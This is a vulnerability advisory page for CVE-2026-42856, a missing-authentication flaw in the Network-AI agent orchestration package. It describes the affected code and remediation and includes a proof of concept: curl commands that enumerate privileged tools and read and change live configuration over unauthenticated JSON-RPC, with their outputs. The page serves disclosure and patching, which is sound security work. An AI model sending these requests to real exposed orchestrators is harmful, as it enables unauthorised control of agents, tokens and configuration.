Skip to main content

Network-AI CVE-2026-42856

HIGH
Missing Authentication for Critical Function (CWE-306)
2026-05-05 https://github.com/Jovancoding/Network-AI GHSA-fj4g-2p96-q6m3
8.7
CVSS 4.0 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.7 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
X

Lifecycle Timeline

4
Re-analysis Queued
May 11, 2026 - 18:22 vuln.today
cvss_changed
CVSS changed
May 11, 2026 - 18:22 NVD
8.7 (HIGH)
Source Code Evidence Fetched
May 05, 2026 - 18:01 vuln.today
Analysis Generated
May 05, 2026 - 18:01 vuln.today

DescriptionGitHub Advisory

Security Advisory: Missing Authentication for Critical Function in Jovancoding/Network-AI

FieldValue
ProjectJovancoding/Network-AI
Repositoryhttps://github.com/Jovancoding/Network-AI
Affected commitc344f2053eb0d49395988f803bf92f2a86b2a0d0
Affected tested version5.1.2
Vulnerability typeCWE-306: Missing Authentication for Critical Function
SeverityHigh
Authentication requiredNone
Default network exposureBind address 0.0.0.0
Reporter validation date2026-04-21

Summary

The MCP HTTP transport accepts JSON-RPC tools/call requests with no authentication, session, origin, or token check, and dispatches them directly to the orchestrator's tool registry. The default bind address is 0.0.0.0. As a result, any party with network reachability to the service can enumerate and invoke privileged management tools - including reading and mutating the live orchestrator configuration, listing registered agents, dispatching agents, creating/revoking security tokens, and adjusting global budget ceilings.

Affected Code

  • bin/mcp-server.ts:75 - server binds to 0.0.0.0 by default.
  • lib/mcp-transport-sse.ts:155 - handleRPC() dispatches tools/call directly to the provider's call(toolName, toolArgs).
  • lib/mcp-transport-sse.ts:379 - _handlePost() parses the JSON-RPC body and calls this._bridge.handleRPC(rpc) with no auth check.
  • lib/mcp-tools-control.ts:80 - config_get exposes live runtime configuration.
  • lib/mcp-tools-control.ts:197 - agent_list exposes registered agents.
  • lib/mcp-tools-control.ts:231 - config_set mutates runtime configuration in place: this._config[key] = parsed.

Proof of Concept

The PoC was executed against a local Docker build of the affected commit, bound to http://localhost:13001. No authentication header was sent. All inner-JSON excerpts below are decoded from the JSON-RPC result.content[0].text field for readability; the raw wire transcripts (which contain the literal escaped JSON-RPC envelope) are in evidence/.

Step 1 - list exposed tools (unauthenticated)

bash
curl http://localhost:13001/tools

HTTP/1.1 200 OK - body returned 22 tools. Privileged tools observed in the inventory include:

  • config_get, config_set - read and mutate live orchestrator configuration
  • agent_list, agent_spawn, agent_stop - enumerate, dispatch, and stop agents
  • token_create, token_revoke - mint and revoke security tokens
  • budget_set_ceiling - adjust the global token budget ceiling
  • fsm_transition - drive finite-state-machine transitions
  • blackboard_write, blackboard_delete - mutate the shared blackboard

Full transcript: evidence/01_get_tools.txt.

Step 2 - read live configuration (unauthenticated)

bash
curl http://localhost:13001/mcp \
  -H 'Content-Type: application/json' \
  -d '{"jsonrpc":"2.0","id":1,"method":"tools/call","params":{"name":"config_get","arguments":{}}}'

HTTP/1.1 200 OK - decoded inner JSON:

json
{
  "ok": true,
  "tool": "config_get",
  "data": {
    "blackboardPath": "./swarm-blackboard.md",
    "maxParallelAgents": null,
    "defaultTimeout": 30000,
    "enableTracing": true,
    "grantTokenTTL": 300000,
    "maxBlackboardValueSize": 1048576,
    "auditLogPath": "./data/audit_log.jsonl",
    "trustConfigPath": "./data/trust_levels.json"
  }
}

Full transcript: evidence/02_config_get_before.txt.

Step 3 - mutate live configuration (unauthenticated)

bash
curl http://localhost:13001/mcp \
  -H 'Content-Type: application/json' \
  -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"config_set","arguments":{"key":"defaultTimeout","value":"12345"}}}'

HTTP/1.1 200 OK - decoded inner JSON:

json
{
  "ok": true,
  "tool": "config_set",
  "data": {
    "key": "defaultTimeout",
    "previous": 30000,
    "current": 12345,
    "applied": true
  }
}

Full transcript: evidence/03_config_set.txt.

Step 4 - confirm mutation persisted (unauthenticated)

bash
curl http://localhost:13001/mcp \
  -H 'Content-Type: application/json' \
  -d '{"jsonrpc":"2.0","id":3,"method":"tools/call","params":{"name":"config_get","arguments":{}}}'

HTTP/1.1 200 OK - decoded inner JSON (relevant key only):

json
{
  "ok": true,
  "tool": "config_get",
  "data": {
    "defaultTimeout": 12345
  }
}

This proves the runtime change applied by step 3 is observable on the next read. Full transcript: evidence/04_config_get_after.txt.

Step 5 - enumerate registered agents (unauthenticated)

bash
curl http://localhost:13001/mcp \
  -H 'Content-Type: application/json' \
  -d '{"jsonrpc":"2.0","id":4,"method":"tools/call","params":{"name":"agent_list","arguments":{}}}'

HTTP/1.1 200 OK - decoded inner JSON:

json
{
  "ok": true,
  "tool": "agent_list",
  "data": {
    "agents": [],
    "count": 0
  }
}

This is a privileged management read; the empty array reflects the test environment, not a control. Full transcript: evidence/05_agent_list.txt.

Cleanup - runtime state restored

After the PoC, defaultTimeout was restored to 30000 via the same unauthenticated config_set (previous":12345,"current":30000,"applied":true). All testing was performed against a local Docker container only.

Impact

  • Unauthenticated network access enables full enumeration and invocation of the orchestrator's management functionality.
  • An attacker can change runtime configuration (e.g., defaultTimeout, enableTracing), dispatch or stop agents, mutate the shared blackboard, mint or revoke security tokens, and adjust global budget ceilings.
  • The default 0.0.0.0 bind, combined with the absence of any auth gate, increases the likelihood of accidental exposure on any host with a routable interface.

Suggested Remediation

  1. Enforce authentication inside _handlePost() before reaching handleRPC(). At a minimum, require a shared secret / bearer token loaded from configuration; reject any request that does not present it.
  2. Default the bind address to 127.0.0.1. Require an explicit configuration opt-in to bind to non-loopback interfaces, and warn on startup when binding outside loopback without an authentication mechanism configured.
  3. For tool-level defense in depth, gate state-mutating tools (config_set, agent_spawn, agent_stop, token_create, token_revoke, budget_set_ceiling, fsm_transition, blackboard_write, blackboard_delete) behind an explicit authorization check tied to a verified caller identity.

Verification Environment

  • Local Docker container only; no third-party deployment was tested.
  • Local build required a minimal Dockerfile fix; the application code path under test was not modified.
  • Runtime state (defaultTimeout) was restored to default after the PoC.

Attached Evidence

Files in evidence/ are raw curl -i transcripts captured during the verification sequence above. They are provided as supplementary backup; the key excerpts are already inlined in this report.

FilePurpose
01_get_tools.txtStep 1 - full GET /tools request and 22-tool inventory response
02_config_get_before.txtStep 2 - full config_get request and live configuration response
03_config_set.txtStep 3 - full config_set request mutating defaultTimeout
04_config_get_after.txtStep 4 - full config_get request showing the mutation persisted
05_agent_list.txtStep 5 - full agent_list request and response

AnalysisAI

Unauthenticated remote access to privileged management functions in Network-AI npm package (versions ≤5.1.2) allows attackers to read and mutate orchestrator configuration, enumerate and control agents, create or revoke security tokens, and adjust global budget ceilings. The MCP HTTP transport binds to 0.0.0.0 by default and accepts JSON-RPC tool invocation requests without authentication, session validation, or origin checks. Public exploit code exists demonstrating enumeration of 22 privileged tools and successful mutation of runtime configuration parameters via simple HTTP POST requests. Vendor-released patch: version 5.1.3 available per GitHub advisory GHSA-fj4g-2p96-q6m3.

Technical ContextAI

Network-AI is an npm package (pkg:npm/network-ai) implementing an AI agent orchestration framework with an MCP (Model Context Protocol) HTTP transport layer that accepts JSON-RPC 2.0 requests. The vulnerability stems from CWE-306 (Missing Authentication for Critical Function) where the SSE transport handler in lib/mcp-transport-sse.ts processes tools/call RPC methods without any authentication gate. The server binds to 0.0.0.0:13001 by default, exposing the JSON-RPC endpoint to any network-reachable client. The _handlePost() method at line 379 parses incoming JSON-RPC payloads and directly invokes handleRPC() which dispatches to the tool registry without validating caller identity, bearer tokens, session state, or request origin. Affected modules include mcp-server.ts (default bind configuration), mcp-transport-sse.ts (RPC dispatch path), and mcp-tools-control.ts (privileged tool implementations including config_set, agent_spawn, token_create, and budget_set_ceiling). The architecture conflates network reachability with authorization, treating any TCP client as a trusted management console.

RemediationAI

Upgrade immediately to Network-AI version 5.1.3 or later, as documented in the GitHub advisory GHSA-fj4g-2p96-q6m3 (https://github.com/Jovancoding/Network-AI/security/advisories/GHSA-fj4g-2p96-q6m3). The patch addresses the root authentication bypass in the MCP transport layer. For deployments that cannot immediately upgrade, implement these compensating controls with noted trade-offs: (1) Change the bind address from 0.0.0.0 to 127.0.0.1 in bin/mcp-server.ts line 75 to restrict access to localhost only - this breaks legitimate remote management and requires SSH tunneling or sidecar access patterns. (2) Deploy a reverse proxy (nginx, Envoy) in front of the MCP endpoint with mandatory bearer token authentication before the /mcp path - adds operational complexity and latency but provides immediate auth gate. (3) Use network segmentation to isolate the orchestrator on a management VLAN with firewall rules blocking port 13001 from untrusted networks - effective but requires infrastructure changes and may conflict with microservice mesh patterns. (4) If running in Docker/Kubernetes, do not publish port 13001 to the host network and restrict access via internal service networking with NetworkPolicy objects - limits deployment flexibility for hybrid environments. All workarounds trade functionality or operational overhead for security; version 5.1.3 is the only full remediation. Verify the patch by confirming that _handlePost() method now includes an authentication check before calling handleRPC().

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Share

CVE-2026-42856 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy